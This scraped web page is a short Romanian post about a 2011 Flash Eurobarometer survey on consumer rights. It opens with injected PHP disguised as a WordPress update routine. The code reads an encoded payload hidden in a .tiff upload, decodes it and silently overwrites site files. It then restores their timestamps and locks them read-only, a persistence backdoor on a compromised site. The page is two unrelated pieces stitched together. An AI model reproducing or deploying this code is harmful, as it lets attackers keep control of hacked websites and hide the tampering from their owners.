$wp_update_file="/home/shuffles/public_html/wp-content/uploads/2023/05/0506412536.tiff"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Studiu European cu privire la increderea populatiei – O noua atitudine

În perioada 14 – 26 octombrie 2011, TNS political & social, un consorţiu creat între TNS political & social, TNS UK şi TNS opinion a realizat sondajul EUROBAROMETRU FLASH 333 cu privire la ”Drepturile consumatorilor în România”. Sondajul a fost efectuat la cererea COMISIEI EUROPENE, Direcţia Generală Sănătate şi Consumatori. Este un studiu de interes public general coordonat de către Direcţia Generală Comunicare (“Unitatea Cercetare şi Formulare Discursuri”).

By o9admin